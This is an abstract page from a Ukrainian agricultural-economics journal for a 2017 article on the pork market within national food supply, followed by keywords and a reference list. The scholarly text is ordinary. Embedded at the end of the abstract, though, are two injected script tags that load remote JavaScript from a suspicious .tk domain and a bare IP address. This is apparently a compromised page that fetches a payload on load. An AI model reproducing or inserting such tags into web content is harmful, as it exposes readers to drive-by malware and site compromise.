ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.516.4:636.4
Аграрний ринок

Ринок продукції свинарства в системі продовольчого забезпечення країни / Мазуренко О.В. // Економіка АПК. - 2017. - № 10 - С. 60

Відзначається, що перехід галузі свинарства на ринкові засади і практика функціонування ринку до раніше накопичених завдань додав нові, розв’язання яких ускладнюється різким скороченням державної підтримки, диспаритетом цін, зростанням вартості комбікормів, порушенням економічних відносин та іншими негативними моментами. У цих умовах не вдалося підвищити ефективність виробництва свинини й функціонування її ринку. Він розвивається стихійно через нерозвиненість інфраструктури, слабку інформаційну забезпеченість господарюючих суб'єктів, значну частку посередників, недосконалість механізму ринкових відносин між сільськогосподарськими товаровиробниками та переробними підприємствами, сферою реалізації свинини і продуктів її переробки. Визначено, що ринок продукції свинарства формується під впливом об'єктивно існуючих принципів розвитку продовольчого ринку. Його якісного перетворення, можливо досягти за рахунок комплексної та планомірної роботи по розв’язанню системних проблем. Подальший розвиток ринку продукції свинарства має здійснюватися за державної підтримки, освоєння сучасних технологій ведення виробництва, економного витрачання фінансових і матеріальних ресурсів, ефективної взаємодії виробників та ключових споживачів продукції свинарства, оптимізації її товарообороту. Рис.: 1. Бібліогр.: 11.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: ринок продукції свинарства, продовольчий ринок, державна підтримка, інфраструктура, механізм ринкових відносин

Список використаних джерел

 1. Березін О.В. Продовольчий ринок України: теоретико-методологічні засади формування і розвитку: [монографія] / О.В. Березін. - К.: Центр учбової літератури, 2008. - 184 с.
 2. Дадашев Б.А. Економіко-фінансовий механізм розвитку регіонального продовольчого ринку: [монографія] / Б.А. Дадашев, С.Г. Черемісіна, В.В. Обливанцов. - К. : ННЦ “Інститут аграрної економіки”, 2012. - 358 с.
 3. Долішній М.І. Ринок продовольства України в аспектах СОТ: [монографія] / М.І. Долішній, В.І. Топіха, В.В. Булюк, В.А. Романова. - Миколаїв: МДАУ, 2006. - 220 с.
 4. Лозинська Т.М. Національний продовольчий ринок в умовах глобалізації: [монографія] / Т.М. Лозинська. - X.: Вид-во ХарРІ НАДУ „Магістр”, 2007. - 272 с.
 5. Мазуренко О.В. Формування первинної пропозиції на ринку м'яса / О.В. Мазуренко // Вісник Східноевропейського університету економіки і менеджменту. - 2009. - № 2 (6). - С. 4-10.
 6. Мазуренко О.В. Розвиток ринку свинини в Україні / О.В. Мазуренко // Науково-виробничий журнал ”Бізнес-навігаток”. Економіка - підприємництво - 2011. - № 23. - С. 15-20.
 7. Осташко Т.О. Внутрішній агропродовольчий ринок України в умовах СОТ / Т.О.Осташко, Л.Ю., Волощенко, Г.В. Лєнівова - К.: Ін-т економ. та прогнозування, 2010. - 208 с.
 8. Porter M. Konkurentnoye preimushchestvo. Kak dostich vysokoho rezultata i obespechit eho ustoichivost / M. Porter. - M.: Alpyna Biznes Buks, 2006. -715 s.
 9. Hammel G., Prahalad C.K. The Core Competence of the Corporation, Harvard Business Review, 71, May - June 1990, 71: P. 79 - 91.
 10. Commons J.R. Institutional Economics // American Economic Review/ - V.21. - 1931. - PP. 68-657. - Retrieved from: ttp:/www.socserv2.socsci.mcmaster.
 11. Edgeworth F.Y. Mathematical Psychics. Mountain Center, CA: James &amp; Gordon, 1995. - 176 p.